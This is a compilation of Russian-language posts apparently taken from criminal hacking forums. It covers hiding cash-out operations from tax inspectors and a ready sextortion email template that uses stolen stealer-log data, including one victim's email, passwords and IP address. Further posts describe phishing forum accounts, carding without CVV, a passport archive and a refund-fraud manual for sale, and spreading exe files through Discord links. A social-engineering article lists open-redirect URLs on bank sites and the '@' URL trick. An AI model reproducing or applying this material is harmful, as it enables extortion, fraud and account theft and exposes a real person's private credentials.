но более рисковыми, какие-то идут как “красная тряпка” для ФНС. Схемы могут
быть от “компенсации выплаты сотруднику при увольнении” до “Векселей”,
“Недвижимости” и прочего. Все будет зависеть, прежде всего, от Вашей
изобретательности, которая зачастую идет вразрез с позицией ФНС и прочих
замечательных органов.
Если юриспруденция, налоговый и бухгалтерский учет Вам более - менее знакомы,
то сначала настоятельно советовал бы ознакомиться с 115 ФЗ "О противодействии
легализации (отмыванию) доходов, полученных преступным путем, и финансированию
терроризма". Как только внимательно прочитаете закон - некоторые "типовые
вопросы" у Вас, вероятнее всего, отпадут.
Если все изложенное выше понятно, то идем дальше.
Когда заходит разговор про создание конторы для оказания подобного рода услуг,
некоторые забывают, а может и не знают, что сейчас далеко не последнюю роль
играет техника безопасности.
Важным моментом является техника безопасности хранения и передачи информации.
Все необходимое, касательно безопасности хранения и передачи информации, есть
на Runion, стоит только немного поискать. Да даже больше чем необходимое, я бы
сказал.
ФНС вправе изъять компьютеры, серверы, жесткие диски, флэшки и прочие
предметы, которые могли бы быть задействованы в противоправной деятельности.
IP, кстати, сейчас тоже начинают дергать чтобы доказать аффилированность.
Ознакамливаемся с Статьей 94. Выемка документов и предметов НК РФ.
Spoiler: Посмотреть
Файлы, содержащие фактические показатели деятельности организации, — находка
для контролеров. Органы ищут таблицы, в которых отражена реальная выручка
компании. На основе этих таблиц они доначисляют налог на прибыль, НДС, единый
налог при упрощенке и пр.
Органы изъяли жесткий диск, принадлежащий упрощенцу. Они обнаружили файлы в
формате Exсel, содержащие реальные сведения о ежемесячной выручке. На основе
неофициальных данных о реальной выручке они доначислили компании налоги по
общей системе.
В другом деле контролеры также определили размер выручки упрощенца на основе
электронных таблиц. Они доначислили обществу налоги по общей системе. Суд
указал, что компания скрыла достоверные сведения о выручке, она вела двойную
бухгалтерию. Арбитры пришли к выводу, что общество утратило право на
применение упрощенки. Налогоплательщик превысил лимит по выручке
Spoiler: Посмотреть
Установлено, что органы осмотрели системный блок, принадлежащий компании. Они
обнаружили изображения сканированных документов, составленных от имени двух
сомнительных субподрядчиков.
Кроме того, фискалы нашли сканированный белый лист, на котором был оттиск
печати синего цвета и образец подписи
директора одного из субподрядчиков. Налогоплательщику не удалось доказать, что
бухгалтер использовал изображения печати и подписи контрагента для достижения
правомерной цели. Пришли к выводу, что документооборот с субподрядчиками
фиктивный
Spoiler: Посмотреть
Органы ищут в офисе проверяемой компании проекты электронных документов в Word
и Excel. Документы от имени контрагента-однодневки оформляют сотрудники
проверяемой компании. Например, договоры, счета-фактуры, акты, письма на
бланках контрагента.
Если обнаружат в офисе компании проекты электронных документов с сомнительными
контрагентами, то доначислений не избежать. В одном из споров контролеры
усомнились в реальности сделок с посредником. Они сняли расходы на
посредническое вознаграждение. В результате выемки они обнаружили на
компьютере замдиректора компании файлы, относящиеся к деятельности
контрагента.
В файле «Доход. Расход.xls» фискалы увидели затраты, не относящиеся к
деятельности проверяемой компании. Это, в частности, зарплата, страховые
взносы, дивиденды, интернет.
Зачастую инспекторы находят в офисе проверяемой компании документы, печати и
ключи к интернет-банкингу третьих лиц. Как правило, это сомнительные
контрагенты. В этом случае контролеры изымут информацию из компьютеров
налогоплательщика. Переписка, ключи, копии паспортов, печати, даже
нарисованные схемы (да, бывает и такое), чистые листы с оттиском печати и
подписью руководителя - все это идет в доказательную базу. Как показала
практика, в первую очередь органы осматривают компьютеры в бухгалтерии. Они
также могут осмотреть компьютеры юристов, менеджеров, руководителей. Особый
интерес представляют серверы, флеш-карты, съемные диски. Выше уже писал об
этом.
Ведь если государственные попрашайки, либо другие интересные ребята найдут
нужную им информацию - Вы подставите не только себя, но и Заказчиков услуг. А
это иногда чревато отравлением свинцом через мозг.
Примеры:
Spoiler: Показать
В ходе проверки «ИН-УралМПК» сотрудники УНП ГУВД по Свердловской области
установили, что руководство уклонилось от уплаты налогов на общую сумму более
10 млн руб. путем изготовления фиктивных документов с
предприятиями-«одновневками» на поставку черных и цветных металлов и внесением
в декларацию заведомо ложных сведений. По данному факту было возбуждено
уголовное дело по п. «а», «б» ч. 2 ст. 199 «Уклонение от уплаты налогов и
(или) сборов с организации» УК РФ.
В июле 2008 г. Кировский районный суд г. Екатеринбурга признал всех фигурантов
по делу виновными. Учредителю и генеральному директору фирмы Владимиру
Бельтюкову было назначено наказание в виде 2,5 лет лишения свободы, директору
предприятия Сергею Канюкову — в виде 6 месяцев лишения свободы, главному
бухгалтеру Наталье Козинец — в виде 2 лет лишения свободы условно. Их
пособникам, предоставлявшим реквизиты и печати фирм-«однодневок» и
занимавшихся незаконным обналичиванием средств, суд назначил соответственно 6
месяцев и 2 года лишения свободы
Spoiler: Показать
Напомним, 21 мая три человека запихнули "обнальщика" в машину возле его дома
на улице Савушкина, вывезли в Лисий Нос, пытали, а затем убили. По одной из
версий, "обнальщик" здорово им задолжал. Используя видеокамеры и данные
биллинга, полицейские задержали подозреваемых: 24-летнего молодого человека и
31-летнюю женщину. Предполагаемые убийцы вывели полицейских и на след третьего
соучастника преступления. Им оказалась женщина 1972 года рождения.
По версии следствия, причиной совершения преступлений стали финансовые споры,
Spoiler: Показать
Раскрыто убийство казанского бизнесмена Раиса Ахмадуллина, занимавшегося
обналичиванием денежных средств. Он был застрелен в прошлом году в подъезде
своего дома из пистолета ПСМ — редкого оружия, применяемого спецслужбами.
Выяснилось, что господин Ахмадуллин мог стать жертвой участников казанского
организованного преступного формирования (ОПФ) «Калуга», а нападение было
совершено с целью ограбления — у него забрали портфель с 2 млн руб. В
настоящее время арестовано
семеро предполагаемых участников ОПФ.
Резюмируя о безопасности: Безопасность хранения и передачи данных, в том или
ином виде - наше все.
Что касаемо контроля транзакций:
При построении схем странзакций необходимо учитывать систему управления
рисками «СУР АСК НДС-2»
АСК НДС, АСК НДС - 2, АСК НДС - 3 программы, которые самостоятельно проверяют
правильность внесения информации в документы, а также правомерность получения
вычета. При этом совершенно не требуется вмешательства извне.
Схематично работа АСК НДС - 2 выглядит следующим образом:
Если программа находит так называемые разрывы, то начинается проверка:
1. Построение схемы потоков через АСК НДС-2, определение объектов для
работы.
2. Используя доступные ресурсы проверяются все звенья на наличие
численности, собственности и т.д. (Проверка цепочки на наличие помоек).
3. Анализируются р/с на предмет осуществления реальной хозяйственной
деятельности. Наличие арендных платежей, электроэнергии, выплата з/п
работникам, перечисление налогов, дивидендов и т.д. В общем все то, что
подтвердит ведение реальной финансово-хощяйственной деятельности. (Отобранные
ООО проверяются более тщательно на ведение ФХД).
4. Кто представил декларацию о налогоплательщике. Если это уполномоченный
представитель, то соответственно проверяется наличие доверенности и на что она
выдана и кем подписана. (Проверка на аффилированность и наличие номиналов).
5. Запросы в банки для получения документов по счетам на предмет кто
управляет р/с, контактные телефоны и т.д. При наличии подписей сравнивают
(визуально) подписи в доверенности проверяемого налогоплательщика с образцами
в банке. (Выявляются контакты для вызова в МВД).
6. Допрос руководителя в присутствии сотрудника правоохранительных
органов.
7. Запрос документов у операторов электронного документооборота.
Выясняется как налогоплательщик лично, либо через доверенное лицо. Если
очевидно, что подпись в доверенности не руководителя, то задача сделать
экспертизу, чтобы в последующем её аннулировать, а представленную декларацию
признать не действительной. (На этом этапе чаще всего подвисают деньги).
8. Осмотр адреса места регистрации. При отсутствии ООО по адресу
регистрации информация передается в отдел регистрации, с последующим внесением
записи о недостоверности сведений содержащихся в ЕГРЮЛ. (Чтобы Вы понимали, в
марте 2018 года исключили из реестра 222 000 записей о фирмах с недостоверными
или массовыми адресами, массовыми Директорами. С 1 сентября достаточно пометки
о "недостоверности сведений" и через пол года фирма исчетзает из ЕГРЮЛ сама
собой. За это время ее кредитор или сама организация может выразить свое
возражение, которое должно быть мотиваировно).
9. Передача информации в банк о расторжении договора на обслуживание
счета. Данная информация должна содержать выводы налогового органа о том,
почему данный налогоплательщик является транзитной организацией или
организацией, осуществляющей обналичивание денежных средств.
АСК НДС 3
АСК НДС-3 позволяет налоговикам полностью автоматизировать процесс контроля за
движением средств между счетами юридических и физических лиц и повысить его
продуктивность с 10 до 100%. А также видит уплачен ли НДС в этих цепочках.
Раньше подобной темой налоговики занимались вручную. При столь
автоматизированном процессе, находить взаимозависимых лиц не составит большого
труда.
То есть если раньше для возбуждения уголовного дела Следственный комитет
России должен был провести доследственную проверку, запросить встречные
документы у контрагента, сверить данные и сделать выводы, то сейчас этого
делать не требуется, инспектору ИФНС достаточно нажать одну кнопку. Если
программно-аналитический комплекс решит, что компания уклонилась от уплаты
налогов, используя любую схему (будь то дробление фирмы, создание фирм —
однодневок или цепочки посредников), то распечатка в руках инспектора сегодня
уже является достаточным основанием для возбуждения уголовного дела.
Если раньше делали транзит в 5-7 ООО для того чтобы путать ФНС, то сейчас это
очень рискованно. На всякий случай, под транзитом обычно понимают движение
средств между организациями, не обусловленное экономическими причинами. Как
правило, его цель – аккумулирование денег с целью их дальнейшего использования
в каких-либо целях, в том числе, и не совсем законных (взятки, откаты,
уклонение от уплаты налогов, черная зарплата и etc).
В 2018 году органы усиливают акцент на результатах анализа АСК и считают
правонарушение совершённым с того самого момента, когда деньги были отправлены
в адрес заведомо недобросовестного контрагента. Перечислили безнал
недобросовестному контрагенту и подали декларацию — могут возбудить дело по
ст. 159 УК РФ. Соответственно, нужны относительно вменяемые основания
перечисления денежных средств. Разумеется, не только в назначении платежа, но
и сами документы-основания перечисления. Ну и про использование однодневок -
писать смысла нет, так как если внимательно прочитали - использование таких
ООО сейчас может вызвать головную и не головную боль.
Чуть не забыл. Есть такой орган исполнительной власти, осуществляющим функции
по противодействию легализации доходов, полученных преступным путем,
финансированию терроризма и финансированию распространения оружия массового
уничтожения, ну вы поняли... - Финмониторинг. Подозрительные транзакции
блокирует Финмониторинг, который может найди транзакции, подпадающие под
действие Федерального закона № 115-ФЗ «О противодействии легализации
(отмыванию) доходов, полученных преступным путем, и финансированию терроризма»
(С которым Вы уже знакомы). Сделки признают " не имеющими явного
экономического смысла и направленными на транзит денежных средств, для
последующего обналичивания". Финмониторинг может блокировать любые
транзакции, как с ООО на физического лица, так и с "физика" на ООО, с ИП на
ООО, с ООО на ИП (чаще всего), с "физика" на "физика", с ИП на "физика" (даже
если это один и тот же человек). Так вот, учитывать размеры транзакций следует
еще и из Вашей территориальной принадлежности и 115 ФЗ соответственно.
Надеюсь, ознакомившись с этой статьей, будет меньше вопросов и больше
понимания того, что услуги такого плана в наше время, при стандартном подходе
к этому делу, чаще несоразмерны последствиям, которые может понести человек.
Ведь за "повисшие" деньги отвечать будете Вы.
Для КОНКУРСА СТАТЕЙ НА ФОРУМЕ XSS.IS
ВНИАНИЕ!!!!!! ТОП СОДЕРЖИТ НЕНОРМАТИВНУЮ ЛЕКСИКУ
Просьба убрать с ваших чудных экранов, детей, беременных, зверей, беременных
зверей, и беременных с ввх ( это не для вашей психики).
Итак поехали!!!
Привет ребята. В честь приближающегося НГ решил запилить вам статью о том, как можно, и иногда нужно подымать кеш, когда хочеться хорошенько погулять на Новый Год, а так же проебать, то что вы заработали ( ну не грех это, ради этого и живем)
Отступление... Лирика... Скудная слеза стариков.. Недопонимание вещей
![](/proxy.php?image=https%3A%2F%2Fs3-eu- central-1.amazonaws.com%2Fthequestion%2F962%2F53096-73377410.jpeg&hash=6498155ebb69211da4f01fdc69237ed9)
Для меня, нет такого понятия, как кардер, либо хакер, либо скамер, либо
вирусмейкер.
Обосную это тем, что да да, в 21 веке принято называть кардерами, тех людей,
кто пошел купил сс, вбил товара либо гифту, получил профит. Скамер, этот тот,
что наебывает людей за монету. Хакер это тот, что ломает сайты, сервисы...
Я думаю это бред. Все пошло с хака....
Хакер это, тот человек, который умеет все.. Абсолютно все,
Как говорится, сам взломал, сам слил, сам отработал. И вы можете поспорить со
мной, сказать - да ты брат несешь х#йню, кардеры есть кардеры, хакеры есть
хакеры, скамеры есть скамеры.
Но мое мнение, что априори, все подвиды наших профессий вышли с хака.
И еще я мнения, что нет нерабочих схем, либо тем, просто нельзя брать схему с
пабла и работать по ней, надо делать каждую схему под себя, не важно, будь то
вы трояните админа шопа, куда вы хотите доступ, дабы поставить снифер сс, либо
фейсбук, где вы делаете дропов, либо конкурс на айфон, главное всегда делать
все под себя.
Как сделать?
Стать жертвой. Поставить себя на место того, с кого вы хотите подрубить
монету. Вот при таком подходе, когда вы сами себе верите, правда, поверит и
ваша жертва.
![](/proxy.php?image=http%3A%2F%2Fwww.sciencedebate2008.com%2Fwp- content%2Fuploads%2Fevo-1.jpg&hash=38406036fdbed96a90cc9f8ab8f9c40b)
**Начало начал
**
Конец нового года, а монету хочеться, шопы стали ебать мозги, коллеги ушли в запой предновогодний. Дело было к вечеру, делать было нечего.
Бороздя просторы експлоита, наткнулся на забавную тему:
https://forum.exploit.in/index.php?showtopic=144102
смешно не правда ли?
потом на эту:
https://forum.exploit.in/index.php?showtopic=133016
а потом и на эту:
https://forum.exploit.in/index.php?showtopic=149987
Что делает простой человек? Правильно! Читает, говорит спс, и забивает х#й.
Что делает человек, котороу необходимо поднять монету? Правильно! Апгрейдит
темы, и получает выхлоп.
Сегодня мы будет с паблик схем, делать свою схему.
Как? Да все просто. Обычная наблюдательность, трезвый ум, и желание.
Читаем темы по линкам, что я скинул выше, далее совмещаем их, и вуаля у нас тема.
Делаем дело
![](/proxy.php?image=http%3A%2F%2Fregionby.org%2Fwp- content%2Fuploads%2F2012%2F01%2Fdelo.jpg&hash=ce46af6e78f1ef0fa09f4548ac4cf178)
Итак, подраскинув мозгами, читаем забавную тему, про то, как какие то негры, скамят людей, шантажа их, и просят за это биток. Вроде нихуя гениального нет в данной теме. Но она будет планктоном для нашего дела.
Далее мы смотрим, тестируем, уводим логи с стилеров, и что в итоге у нас на руках?
На руках материал, с которым мы будем работать, а именно:
Раз
Потом два
Ну и три
Так. Данные у нас на руках.
Ну кто умнее, прочекает себе плюхи, а если окажутся линки отработаными ( что
более вероятно), мы архив не выкидываем, а отработаем мы их с вами, по
нигерийской схеме скама.
Значит так. Берем с логов мейл хозяина, выдергиаем его пасс оттуда, далее выдергиваем для пущей правдоподробности еще 3-5 аков с паролями с разных сервисов, и еще для более убедительности, берем его IP и скрин с экрана.
Текст письма счастья
Spoiler
Тема письма:
U'R COMPUTER HACKED -
tylerdaintyat74@gmail.com pass
Liverpool1972
// тут указываем логин и пасс от мыла, чтобы письмо было прочитано, и
конверсия выше становиться.
Attention! Important information
As you could probably have guessed, your COMPUTER was hacked
Now I have access to you all accounts and u'r computer!
Need proof? Ok
For example, your have password for
tylerdaintyat74@gmail.com is Liverpool1972
facebook pass rosebridge84
steam Liverpool1972fc
paypal and amazon pass rosebridge84666
Maybe need many proof? Ok.
See. U'r IP adress 86.4.199.62 and look this sreen from your desktop:
ТУТ ПРИКРЕПЛЯЕМ В ПИСЬМЕ СКРИН ЕГО ДЕСКТОПА
Within a period from June 20, 2018 to December 13, 2018, you were infected by
the virus we’ve created, through an adult website you’ve visited.
So far, we have access to your messages, social media accounts, and
messengers, and have access all files ( credit card, bank acc, ebay, all u'r
picture, photo, soft , messages in social networks access to online shopping
and more...)
Moreover, we’ve gotten full damps of these data.
We are aware of your little and big secrets…yeah, you do have them. We saw and recorded your
But the key thing is that sometimes we recorded you with your webcam, syncing
the recordings with what you watched!
I think you are not interested show this video to your friends, relatives, and
your intimate one…
Transfer $700 to our Bitcoin wallet: ТУТ БИТКОИН КОШЕЛЬ ВАШ ПИШИТЕ
(It is cAsE sensitive, so copy and paste it)
If you don’t know about Bitcoin please input in Google “buy BTC”. It’s really easy.
I guarantee that after that, we’ll erase virus and and leave you alone.
A timer will start once you read this message. You have 48 hours to pay the above-mentioned amount.
Our virus will be erased once the money are transferred and your files will be
safe.
If they are not, all your messages and videos recorded will be automatically
sent to all your contacts found on your devices at the moment of infection.
You should always think about your security. We hope this case will teach you to keep secrets.
Important:
- You now have 48 hours in order to make the payment. (I've a specific pixel within this mail, and now I know that you have read through this e mail). If I do not get the BitCoins, I will block and delete all data info from your computer,I'll destroy all...( computer, account,email etc) I will change passwords everywhere, and you will not be able to access your accounts and computer, use your payment information and many bad deeds.
- If you want to change passwords, reinstall windows, the bad news, it will not help. I will see it, and start deleting all your files. I will also send newsletters to your contacts messengers.
- If you do not pay, your data will be compromised for illegal purposes.
There will be problems with credit history, credit card, accounts, family,
friends, do you need it? I think not. So pay and we will leave you alone.
It is better to pay once than to lose all your data, restore it, from online
store to credit card. This is hell. By paying us, I promise, we will not touch
your data, and remove the virus from the computer.
I definitely will send your video recording to all of your contacts including
family members, colleagues, etc. Nevertheless, if I do get paid, I'll destroy
the video immidiately and remove the virus from your computer.
If you want evidence, reply with "Yes!" and I will remove some of the
information important to you and I will send out your video to your 6
contacts. It is a non-negotiable offer, so don't waste my personal time and
yours by replying to this email message.
Take care of yourself.
вот как выглядит в реале письмо щастя у нашей жертвы:
Почему при таком подходе, конверсия выше? Да все просто.
При спаме нигерийцами, будут вестись из 10к прочитаных, только 1-2 человека,
при данном подходе, с 1к прочитаных, присядут на очко 50-70 человек, 4-5
заплатит. Не плохо?
Ну как то так. Сначало я писал с мыла хозяина, сам себе, создавая папку в мыле новую, и еще закидывать во входяшие, но это много времени сосет, поэтому регнут был мейл на торе, и отправка этого чуда письма ( на конверсию не повлияло).
Ну и для тех, кто хочет пиздануть, что это все херня, и оно не работает, вот словил монету последнюю.
Можете далее давать советы, где мне лечиться, куда пойти, и шо делать.
Для таких моржеебов я вначале дал предупреждение, ну, а тру скамеры, и умные
ребята, подчерпнут что-то для себя, и найдут всегда свою схему, и будут
работать. А те кто ноет, что ничего не работает, даже не соизволили жопу
поднять, вы просто ленивы...
Далее хочу сделать апдейт данной темы, и буду уже точечно пробивать, писать, может быть даже смс-сить либо прозвон закажу, крч сделаю все, дабы человек шел на эту тему, и готов был заплатить.
И запомните, это не инструкция, это просто образ того, как можно с любой темы, даже смехотворной, сделать вполне рабочую тему.
С вами был Кверти.
С НГ ребята
Спешиол фор эксплоит
(с) QwErTyYyY
Всем привет видео не будет поговорим как можно через фишинг угнать акк на любом борде,все прекрасно знаем чтобы атака с работала нужно усыпить бдительность получателя письма. кли- кай
Думаю все знаю такие письма от бордов когда отвечают в теме где Вы писали то если там пишут ответ прилетает подобного вида письма,по своему опыту скажу что в таком письме щелкаешь по кнопки посмотреть эту тему. кли- кай
Выше настоящие письмо,ниже фейк сделанный за минуту иконку специально не стал лепить,кто найдет отличие молодец,где настоящая почта борда. кли- кай
Как с версать такое письмо по быстрому ниже примеры тыц и тыц
Вообщем для реализации нужен школьный фейк со страницей авторизации и редирект на страницу темы,в начале смотрим где жертва постила за день и отсылаем фейк как авторизовался в теме пишем такой же ответ ему придет второе письмо без палива
Привет форум я с соседнего борда хотелось бы рассказать: "Как получить 10 гб к вашему тарифу Tele2" либо же Получить какой-то бонус.
Нам потребуется:
1.Телефон
2.Какой либо тариф с интернет-трафиком
3.Вежливость
Начало:
1.Качаем приложение с Play Market либо App store приложение "Мой Теле2"
2. Заходим в него и Жмякаем на кнопку "помощь"
3. Жмекаем на кнопку "Задать вопрос"
4.Жмяк на эту кнопку
5.Пишем, что хотим перейти на Мтс или другие операторы
Ну и смотрим скрины переписки:
После этих мохинаций видем появился набор с 10гб MNP
Ну вот и все аааааа кстати может быть и это с их стороны
![](/proxy.php?image=https%3A%2F%2Fpp.userapi.com%2Fc851228%2Fv851228351%2F699b2%2FSqyelZt-
alc.jpg&hash=fd0ecde5f046bb9f51775383ebb8ce69)
Вот и все, мануал писал я SILITE поэтому это защищено авторским правом
Чао <3
Злоумышленники использовали XSS уязвимость для похищения номеров кредитных
карт и другой личной информации пользователей PayPal, сообщает netcraft.com.
Обман работал весьма убедительно; люди посылались на URL, находящийся на
подлинном сайте PayPal. Ссылка работала по SSL протоколу и использовала
реальный 256-битный SSL сертификат, что не вызывало сомнений в его
принадлежности к PayPal. Однако, часть этой страницы была изменена засчет XSS
уязвимости, так что когда жертва попадала на нее, видела сообщение: "Your
account is currently disabled because we think it has been accessed by a third
party. You will now be redirected to Resolution Center." ("Ваш счет в
настоящее время заблокирован, поскольку мы думаем, что к нему получил доступ
кто-то постороний. Вы будете перемещены в Resolution Center"). После чего
пользователь перенаправлялся на постороний сервер, где он вводил свой логин и
пароль, которые успешно попадали в руки фишеров.
источник:
http://news.netcraft.com/archives/2006/06/...tity_theft.html
Небольшая собранная сводка новостей о хакерах.
Осторожно русские идут
В США арестовали 4 российских хакеров
Получите..Распишитесь! :rtfm:
первые решения по делу о «26 русских
хакерах»
мне бы девушку хакера
"Сексапильную хакершу" вызовут в суд (хех
Немного о девушке)
Кристина Свечинская
Ребята молодци..
Хакеры «уронили» крупнейшие торрент-
трекеры
Ключ всегда есть..Главное правильно им воспользоваться.. :
Российские хакеры заразили банкоматы
вирусом
Спам:
Российский хакер не признает свою вину
«Создание, использование и распространение вредоносных программ для ЭВМ»
Схвачены хакеры,взломавшие 350 000
компьютеров
Вобщем тут и старое есть..Кому не лень добавляем еще новости.
Ситуация такова. Челу задолжали денег, после этого должник уехал за бугор и надолго пропал. Потом объявился и на вопрос от долге спросил как отдать. Была предложена кредитка и проплата игрового времени на сумму долга. Сказано сделано. Через месяц приходит чардж бэк от кард холдера. Все проплаченые акки в бан. Вопрос, как доказать что не верблюд. И разбанить чаров. Если есть какие механизмы для этого прошу сказать. Или же нефиг было доверять кому попало?
зы: пишу сдесь т.к. в соотв. раздел доступа не имею, за ненадобностью.
«Физический доступ» на закрытую конференцию Кевина Митника
Еще в студенческое время, когда проводились олимпиады и конференции по информационной безопасности меня бесило то, что не принимались методы и работы, включающие в себя социальную инженерию (СИ). Как так?!
Ведь легендарный уже в те времена Митник говорит, что 99% взлома происходит с
использованием СИ.
Не могу передать, какова была моя радость, когда я узнал, что Митник приезжает
в Москву, но еще большую радость мне доставил «рассказ одного моего
знакомого», который попал на закрытую конференцию для бизнес-аудитории. Не
знаю, может это он выдумал, но все же опубликую «текст перевода его письма»,
который он прислал мне с «анонимного почтового ящика».
Под катом отрывок из книги Митника про физический доступ и история про проникновение на конференцию Митника в Москве 2013.
Текст письма
(Письмо было на английском, так что перевод мой, он немного кривоват, картинку
перерисовал тоже я).
О приезде Митника я узнал за пару дней. Поискав в интернетах информацию, я нашел только контакты организаторов. Я разослал несколько запросов от имени кафедры ИБ одного технического университета. Жаль, но на письмо организаторы не ответили. Что ж, я решил пойти другим путем. Я выяснил где будет происходить встреча. Приехал по указанному адресу с намерением разобраться на месте. Это был закоулок на набережной. Он легко обнаружился по указателям и растяжкам с названием мероприятия.
Как это выглядело снаружи:
Это был узкий тупичок. На улице перед входом в здание располагались курилка, столики для кофе-брэйков и ресепшн, где выдавали пропуска. Вход был строго по пропускам, за этим следили 2 охранника, которые 90% были вдвоем, иногда один уходил, но второй всегда оставался на посту.
Я разместился в фиолетовой точке и делал вид, что кого-то жду. Периодически я доставал телефон и говорил в него, что я уже на месте и сколько вас оболтусов еще ждать. Это было всегда в полутора-двух метрах от входа, так что я слышал все что говорят охранники, а они слышали, что говорю я.
Так прошел час, и я собрал довольно много информации. Какого цвета у кого пропуска, как именно проверяют пропуска, есть ли кто проходит без пропусков, как проходят официанты, есть ли служебный вход и тд. За это время произошла смена охранников, что меня порадовало.
За то время, что я стоял, я заметил, что для СМИ иногда выдают бэйджи без ФИО и по цвету они отличались. Так же было замечено, что уже несколько команд СМИ успели зайти и выйти, то есть они сделали репортаж и уехали.
Жду. Наблюдаю. Вижу что выходит очередная команда СМИ с намерением уехать насовсем. Это были пара журналистов-девушек и пара парней-операторов.
Я привлекаю к себе внимание девушек, стою рядом с охранниками, смотрю за всеми цепким взглядом спец.агента. Стараясь устанавливаю контакт глаз.
Вот они уходят, я потихоньку следую за ним. Кругом снует куча народу — участники, организаторы, охранники. Значит идем дальше. Зелеными точками показана траектория следования за СМИ. Не выходя из переулка, я понаблюдал как СМИ перешли через дорогу и стали укладывать камеры в автомобиль.
И вот тут я ускоряюсь, перебегаю дорогу, подбегаю к автомобилю, одна девушка
еще не села внутрь, делаю немного встревоженное лицо и говорю: „Извините, я из
организаторов, вы видели меня у входа, мы помогаем службе безопасности. По
нашей ошибке, мы случайно отпустили вас с бэйджиками, а это по регламенту
запрещено, иначе кто-то может воспользоваться им и несанкционированно пройти в
здание. Сдайте, пожалуйста ваши бэйджи.“
И они сдали. И прощения попросили. Bingo!
Бэйджи есть на руках, но они с женскими ФИО. Хорошо что бэйдж был пластиковый, а ФИО были напечатаны на самоклейке и приклеены к бэйджу. Отковырять их было легко, хотя ручки-то подрагивали.
Так как я знал, что некоторых СМИ пускали просто по бэджу без ФИО, я не стал заморачиваться и не искал ближайшую экспресс-типографию, а набрался дерзости и перешел ко второй стадии.
Я вернулся ко входу, постоял минут 5, достал телефон, подошел поближе к охранникам, чтоб слышали, и произнес в трубу: „Але. Вы уже подъехали? А пропуска с вами? Уже иду, замучился вас столько ждать.“
Затем я завернул за угол, надел бэйдж, повернул его спиной на всякий случай (я видел что и в таком положении охранники впускали внутрь), вернулся ко входу и довольный и уверенный вошел через дверь под пристальным взором охраны.
Первым делом я пошел в банкетный зал и съел сколько смог мяса и пирожных. Полегчало. И как раз объявляют о начале выступления Кевина Митника. Направляюсь в конференц-зал на втором этаже. На второй этаж ведет широкая лестница, делаю шаг на первую ступеньку и слышу твердый, но очень вежливый голос: „Молодой человек, можно вас на минуточку.“
Пам пам. Оборачиваюсь, по бокам лестницы стоят два охранника в более престижных костюмах, чем у тех кто на улице.
"Переверните, пожалуйста, Ваш бэйджик".
Переворачиваю. "Все в порядке, можете проходить"
Какие мысли были у меня в голове, пока я поднимался по лестнице, я оставлю это на усмотрение вашего воображения.
Зато в виде трофея у меня есть книга с подписью Митника, его легендарная визитка и ноунэймовский бэйджик.
Конец истории
Вот такие истории бывают случаются и мне очень любопытно знакомиться с подобными рассказами (а еще интереснее быть участником).
© неизвестен
Братва! Нужна ваша помощь.
Подскажите, как делать перевод с карты на карту без CVV или CVC?
Про KoronaPay знаю но там не всегда пролетает.
Небольшой архив паспортов, в комлекте с снилс.
You must have at least 25 reaction(s) to view the content.
Сливаю мануал за 500$, новый информации вы там не найдете, способ как и везде "пришла пустая коробка", ну в принципе я не удивлён, зачем придумывать новое если и так все прекрасно работает. Цена правда кусается, не понимают зачем люди это покупают если и так все лежит на поверхности.
От автора:
! Крутой мануал, который позволит получать товары с различных маркетплейсов абсолютно на халяву.
Схема довольно высокого качества и работает как часы!
Для начала я бы хотел поблагодарить тебя за приобретение моего обучения.
В этой методичке будут все способы рефанда, которые пользуются99 \ 100 реферов.
Я распишу все шаги от оформления заказа до 100% возврата.
Скачать:
You must have at least 5 reaction(s) to view the content.
Пароль:
xss.is
By sharing any file including exe on discord, you can copy link and share it
anywhere, and it will auto prompt download.
looks legit coming as discord link.
Have fun.
Целенаправленная СИ. Нестандартные техники.
В этой статье мы рассмотрим несколько техник социальной инженерии, которые можно использовать таргетированно, то есть в тех случаях, когда выбрана конкретная жертва (человек или компания). Считается, что таргетированные атаки отнимают больше времени на подготовку. Из опыта я знаю, что спровоцировать сделать что-то сотню случайных человек легче, чем одного конкретного в определенной организации.
В предыдущей статье мы разобрали массовые атаки, но их применимость ограничена. Например, они плохо подходят для тестов на проникновение. Пентестер не может позволить себе исходить из теории вероятностей и рассылать свои ловушки всем сотрудникам проверяемой организации в надежде, что кто-то попадется. Один-два бдительных пользователя оповестят службу безопасности, и атаке конец. Плюс нужна подготовка под конкретную инфраструктуру и специфику заказчика, а приемы социального инженера должны быть нестандартными.
«Белые шляпы», пентестеры и обладатели CEH обычно понимают, что их действия играют не только техническую, но и социальную роль. Я неслучайно упомянул CISO, поскольку их задача — постоянно обучать всех сотрудников основам информационной безопасности. Если ценного специалиста увольняют из-за того, что он открыл зараженный файл, то в этом есть и доля вины нерадивых безопасников.
Правила безопасности всегда пишутся постфактум, а потому инертны и слабо защищают от современных угроз. Банки уже давно не нужно грабить в масках с автоматами — теперь достаточно электронной почты, но во многих финансовых организациях еще живы старые стереотипы. Акцент в них делают на физическую безопасность, считая информационную менее существенной. Достаточно вспомнить недавнюю историю с ограблением ПИР Банка и комментарий его председателя правления: «…с наибольшей вероятностью вирус проник в банк через фишинговое письмо».
Давний парадокс остается актуальным: ИТ-специалисты не устают заявлять, что социальная инженерия — главное зло. При этом многие «безопасники» продолжают считать, что хитроумного софта и однажды написанных инструкций для персонала достаточно, чтобы противостоять киберугрозам.
Доверенный сайт как проходной двор
У вашего файрвола формально настроены «черные» и «белые» списки URL? Тогда мы
идем к вам! Вот несколько примеров, когда на сайте банка используется одна
известная CMS с незакрытым редиректом:
Code:Copy to clipboard
https://avbbank.ru/bitrix/redirect.php?goto=http://plohoyavbbank.ru
http://www.rncb.ru/bitrix/redirect.php?goto=http://zloyrncb.ru
http://www.moscow-bank.ru/bitrix/redirect.php?goto=http://ne-moscow-bank.ru
http://kbivanovo.ru/bitrix/redirect.php?goto=http://hackkbivanovo.ru
Если файрвол смотрит только то, что идет после первого http(s), то пора его подкрутить. Но эта статья не про настройку межсетевого экрана, а про человеческие слабости. Поэтому просто дай сотруднику такую ссылку и проверь, насколько он бдителен и смотрит ли он дальше первого встречающегося http(s).
Что за собака?
Данный способ не сработает с внимательными сотрудниками, но если бы все были
внимательны, то социальной инженерии не существовало бы как явления.
Развивая предыдущий способ для тех, кто привык смотреть, что идет сразу после http://, и думать, что URL безопасен: данная ссылка https://bank.ru@zloysite.ru тоже не приведет ни к чему хорошему.
Почему так происходит? Допустимые в URL символы задокументированы в стандарте RFC 1738. Символ @ используется в URL как специальный разделитель, когда нужно прямо в нем дать права для доступа к странице. В конструкции вида httр://<логин>:<пароль>@<хост>до @ можно указывать практически что угодно. Браузер все равно отправит пользователя на хост, указанный после @.
Что за абракадабра?
